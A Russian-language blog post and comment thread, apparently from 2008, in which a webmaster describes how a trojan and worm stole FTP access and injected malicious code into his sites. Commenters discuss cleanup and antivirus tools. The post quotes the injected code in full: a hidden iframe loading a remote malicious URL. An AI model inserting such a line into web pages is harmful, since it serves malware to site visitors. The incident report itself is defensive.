ГлавнаяБлогиБлог GogA

Подцепил заразу (трояна win32/Kryptik. CH и червя Win32/Pinit)

Опубликовано GogA в Пт, 05/12/2008 - 16:55

Проснулся пару часов назад, смотрю почти все сайты выдают ошибку.

Думаю, что за чёрт?

Лезу в код сайтов и вижу что приписана строчка для вставки скрытого слоя:

<?php echo '<div style="visibility:hiddеn"><ifrаmе src="http://gfdsgf333.com/in.cgi?27" width=100 height=80></ifrаmе></div>’; ?>

Это всё вижу под маком, загружаю ноут с виндой в безопасном режиме и сразу за чистку.

Подцепил трояна win32/Kryptik. CH и червя Win32/Pinit. D оба свеженькие, по датам видно что как сутки — двое появились в базах антивирусных.

Самое интересное, что похоже подцепил через заражённый GIF, зайдя на вредоносный сайт IE7.

Принцип действия заразы

Анализируя то что успел натворить троян/вирь, можно сказать что он искал фтп соединения, сканировал все папки на фтп и в найденные index.* вставлял ифрейм с вредоносным кодом.

Радует: Вебмани на отдельной виртуальной машине — там почти исключена вирусная активность. ЯД тоже на месте. Троян пароли нигде не поменял, теперь это мой долг.

Вспомнил SEObot’а и ещё знакомого, у которого увели 2000 вмз на днях.

Из непонятного: код появился даже на тех сайтах, пароль от которых не был сохранён в тоталкомандере (сохраняю только от аккаунтов с сателлитами). А на части сохранённых — кода нет.

Порадовал Друпал — вставка кода вызывала ошибку, так что большинство пользователей просто видели в течении 4 часов ошибку. Для тех, кто всё же пострадал — приношу извинения и рекомендую обновить антивирусные базы и проверить компьютер.

зы. Как назло, вчера вечером проверял на вирусы в 20-21 час, не помогло, уже сидели в памяти враги.

Убираем последствия

Написал нехитрый скрипт, который позволяет вычищать вставки вируса из файлов.

Подписывайтесь на rss (Что такое RSS?) чтобы оперативно получать информацию о новых записях:
Подпишись на RSS!

Как оттестирую скрипт - выложу на блоге.

Будьте осторожны!

зы. Антивирус Nod32.

Постовые

Любишь ночную клубную жизнь? Все клубы Москвы и области. Будь в курсе вечеринок и новостей из клубной жизни.
Сайт для ценителей кофе: статьи о кофе, кофеварках, кофемашинах.

Поделитесь с друзьями:
Tags:
Да, с вирусами надо быть

Да, с вирусами надо быть осторожнее. Как кошмарный сон представляю себе прошлые события своей чистки сайтов(((

Опубликовано Автоинструктор (не проверено) в Пт, 05/12/2008 - 19:57.
Тот же самый вирус сегодня

Тот же самый вирус сегодня обнаружил...

Опубликовано Гость (не проверено) в Сб, 06/12/2008 - 19:33.
Касперский

Мне больше по душе - почему-то касперкий
Его главное хорошо настроить:)

Опубликовано dert88 (не проверено) в Вс, 07/12/2008 - 13:27.
опять ...

епать Гога, опять по порнухе лазал ?
шутка. =) хотя в каждой шутке есть доля шутки

Опубликовано Сыктывкарский бомж (не проверено) в Вс, 07/12/2008 - 21:11.
вообще ослом не пользуюсь

Ослом не пользуюсь, да и какая порнуха?
Наверное вёрстку тестил в этом убогом браузере и случайно в соседней вкладке что-то открыл ((

Хотя это может быть и не причина, но заражённый гиф Нод нашёл во временных файлах именно осла.

Ну ничего, это урок будет.

Ещё чуть-чуть и для финансовых операций будет или отдельный ноутбук или отдельная виртуальная машина.

Опубликовано GogA в Пнд, 08/12/2008 - 03:25.
Такую же дрянь подцепили

Такую же дрянь подцепили

Опубликовано Гость (не проверено) в Пнд, 08/12/2008 - 14:54.
у меня не только в файле

у меня не только в файле index была добавлена эта строчка, но и в файле /includes/home.php.

Опубликовано EASIER (не проверено) в Пнд, 08/12/2008 - 15:42.
Ближе к ночи выложу скрипт,

Ближе к ночи выложу скрипт, как бороться с последствиями шуршания по фтп от этого червя.

Опубликовано GogA в Пнд, 08/12/2008 - 18:10.
жду скрипта!!! Pinit на 4-х

жду скрипта!!! Pinit на 4-х машинах, даже негде взять чистый user32.dll!

Опубликовано welder (не проверено) в Пт, 12/12/2008 - 12:05.
Скрипт для чистки фтп, пока

Скрипт для чистки фтп, пока только через почту - нужно, пишите.

Опубликовано GogA в Ср, 17/12/2008 - 02:38.
GogA, оправь, пж, на

GogA, оправь, пж, на gazonos@gmail.com, а то нод эти вирусы определяет в мр3 и удаляет. а хочется почистить файлы и послушать.

Опубликовано Гость (не проверено) в Втр, 23/02/2010 - 11:21.
http://gogolev.net/node/94 Оп

http://gogolev.net/node/94

Опубликована уже запись, с инструкцией как чистить пострадавшие файлы.

Опубликовано GogA в Ср, 24/02/2010 - 10:36.
Фигня, а не троян... Помница

Фигня, а не троян...
Помница смотрел исходники полиморфного вируса на php - вот это реальное веселье :) А если хреново права настроены на серваке, то и веселье хостеру и всем пользователям хостинга.

Опубликовано KCEOH (не проверено) в Пнд, 08/12/2008 - 23:12.
Писец, скоро в туалетную

Писец, скоро в туалетную бумагу и в зубочистки вирусы встраивать начнут. Как жить? =)

Опубликовано Роман (не проверено) в Втр, 09/12/2008 - 23:56.
Помогите плиииз

Win32/Pinit - эта гадость не удаляется.... я уже отчаялась.... после нее перестали принтеры работать!!

Опубликовано Александра (не проверено) в Чт, 11/12/2008 - 01:19.
Страшная гатость энти

Страшная гатость энти вирусы... На локальной машине каспер и нод сравнивали... после каспера нод не нашел ничего, а вот после нода каспер одну заразу откапал. вот так вот.
ЗЫ. Без разницы какой антивирь, базы свежие всегда должны быть.

Опубликовано Самарский бомж (не проверено) в Пнд, 15/12/2008 - 09:04.
Ещё чуть-чуть и для

Ещё чуть-чуть и для финансовых операций будет или отдельный ноутбук или отдельная виртуальная машина.

По хорешему не надо ждать этиъ еще чуть чуть. Просто может так чтать, что после чуть чуть денег на отдельный ноутбук уже н ебудет. :) Просто так, заметка... :)

Опубликовано Vetroff (не проверено) в Втр, 16/12/2008 - 00:47.
Ну давно уже народ так

Ну давно уже народ так поступает, кто-то кпк покупает для фин операций, кто-то сейчас берёт Asus eeePC.

Я в сторону последнего смотрю, может на НГ дед мороз подарит :)

Опубликовано GogA в Ср, 17/12/2008 - 02:43.
А это все нод...

Использую лицензионный KIS (Kaspersky Internet Security), отличная защита, один раз мне на сайт подцепили троя, так при заходе KIS заблочил его вызов :)

Опубликовано Мостовой Ю. Р. (не проверено) в Втр, 16/12/2008 - 03:02.
PinitD., PinitF. ...

А как вылечить собственно машину, помимо ликвидации последствий?

Опубликовано CLS (не проверено) в Втр, 16/12/2008 - 09:42.
Свой ноут (не рабочий),

Свой ноут (не рабочий), отключил от инета. Инфы там нужной почти не осталось, так что скоро формат с: ентер.

Опубликовано GogA в Ср, 17/12/2008 - 02:41.
Напишите,как виртаульной

Напишите,как виртаульной машиной пользоваться..
Статью по безопасности, так сказать.Темку подкинул :)

Опубликовано Волжский (не проверено) в Ср, 17/12/2008 - 00:31.
Ответ

В Америке вот недавно вирус-спамера посадили на 7 лет. Конечно, он просто козел отпущения, но нам бы такой не помешал, как думаете?

Опубликовано Милан (не проверено) в Пнд, 12/01/2009 - 02:16.
В тему

Перед новым годом на такой влетел, точнее на 5 сразу разных.
По модерским делам форума проверял ссылки в постах - ну и.
С зачисткой вроде справился.

Но, возникло тут одно но недавно
С моей аськи прет спам, в логах ничего нет. Не могу понять как такое может быть и что главное делать то.

Опубликовано oldvovk (не проверено) в Вс, 18/01/2009 - 04:45.
А что за эксплойт такой с

А что за эксплойт такой с заражённым gif?

Опубликовано Скачать бесплатно (не проверено) в Вс, 01/02/2009 - 22:48.
Мои сайтикы частенько так

Мои сайтикы частенько так вирусовали. Но виноват был не я, тогда моего хостера взламывали и все аккаунты заражали. Но у вас наверное свой сервак.

Опубликовано NOMAD86 (не проверено) в Сб, 07/02/2009 - 10:23.
Искоренить причину это одно,

Искоренить причину это одно, предполагается что это уже сделано. Тут может быть как троян так и взлом хостера.

Пост нацелен на искоренение результатов работы трояна (вставки в код страниц вредоносного кода).

Опубликовано GogA в Пнд, 23/03/2009 - 17:45.
Спасибо

Точно..Win32/Pinit вот эту падлу убивал

Причем на друпале сайты просто вылетели. А вот на вордпрессе на всех сайтах слетела кодировка ( судя по всему с UTF этот троян не очень дружит) на на некторых кроме ифрейма он впихнул загрузчик другого трояна - AVG так парой и ловил

Опубликовано Бомж беглый (не проверено) в Пнд, 20/04/2009 - 00:32.
У меня тоже что то подобное,

У меня тоже что то подобное, но злобного вроде ничего не сделал просто блокировал загрузку сайта пока не удалила вирус

Опубликовано Милая Женщина (не проверено) в Пт, 01/05/2009 - 15:03.
С такой же фигней неделю

С такой же фигней неделю мучался. Решил запустить полную проверку компа. Касперский нашел около 30 троянов и один вирус, несмотря на то что я ежедневно его обновляю и настройки защиты выставил максимальные.

Потом форматнул все что только можно, перезалил вордпресс, поменял все пароли, написал хостеру, чтобы он тоже там почистил.
Второй день - вроде тихо.

Вирусоделов надо в тире выставлять и лупить по ним из боевого оружия...

Опубликовано dakozz (не проверено) в Втр, 12/05/2009 - 14:18.
столкнулся с такои

столкнулся с такои проблемои,этот вирус заблокировал комп и мне пришлось отправлять смс,которое стоит 150 рублеи,кому интересен код разблокировки пишите сюда

Опубликовано Руслан (не проверено) в Сб, 28/11/2009 - 00:10.
Извините, но очень глупо

Извините, но очень глупо потакать шантажистам, только способствуете их развитию.

Полезный сайт для определения стоимости sms — http://smscost.ru/

Опубликовано GogA в Сб, 28/11/2009 - 13:12.
Руслан, подскажите на счёт

Руслан, подскажите на счёт кода, плийз, чтобы смс не отправлять, то же и у меня было((

Опубликовано Гость (не проверено) в Ср, 25/08/2010 - 22:37.
У меня тоже была такая зараза - замучила!!!

Во все индексы вставляла вредоносный код в конце. А потом прописала в .htaccess, что все переходы на мой сайт с поисковиков уходили на левые сайты. В день удалял по два раза. Потом понял, что вирус не на сайте а в компе. Вроде каспер стоял, ОБНОВЛЯЛСЯ падла. Доктор веб помог (curseit) - всю заразу схавал - оказывается была она в гифах (иконки скачал на свою голову)! Так что всем советую - если такая зараза, то качай curseit и используй не тотал-командер и файл-зилу - лучше сразу править в браузере (для этого я теперь использую мазилу.
Крутая капча стоит - скажи где вазял?

Опубликовано wertyuiop (не проверено) в Пт, 09/04/2010 - 21:52.
спасибо за предупреждение

спасибо за предупреждение

Опубликовано evgen (не проверено) в Ср, 08/09/2010 - 10:38.
В клиенте ftp к паролю и

В клиенте ftp к паролю и логину нужно добавить несколько лишних символов, и роботы не пройдут!

Опубликовано gala (не проверено) в Пт, 29/10/2010 - 05:52.
Ловил такой же недавно! но

Ловил такой же недавно! но сейчас антивирус сработал на ура!

Опубликовано Артур (не проверено) в Пнд, 14/02/2011 - 21:02.
Чорт подхватив такой вирус

Чорт подхватив такой вирус по4ти ввесть комп заразил.Кто может подсказать какой интивирус лутше лечит файли??

Опубликовано Гость (не проверено) в Чт, 12/04/2012 - 16:56.
спасибо что предупредили!

спасибо что предупредили! Какой заразы сейчас только нет!

Опубликовано Лида (не проверено) в Чт, 01/08/2013 - 17:20.

Отправить комментарий

Содержимое этого поля является приватным и не будет отображаться публично.
  • Адреса страниц и электронной почты автоматически преобразуются в ссылки.
  • Доступные HTML теги: <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd> <blockquote>
  • Строки и параграфы переносятся автоматически.

Подробнее о форматировании

КАПЧА
Этот вопрос задается для того, чтобы выяснить, являетесь ли Вы человеком или представляете из себя автоматическую спам-рассылку.
 __        __   ___           _____    ___    _____ 
 \ \      / /  / _ \    ___  |  ___|  / _ \  |_   _|
  \ \ /\ / /  | (_) |  / __| | |_    | (_) |   | |  
   \ V  V /    \__, | | (__  |  _|    \__, |   | |  
    \_/\_/       /_/   \___| |_|        /_/    |_|
Введите код, изображенный в стиле ASCII-арт.

Подпишись

Подпишись на RSS!

Друзья сайта

Последние комментарии

Регистрация доменов ru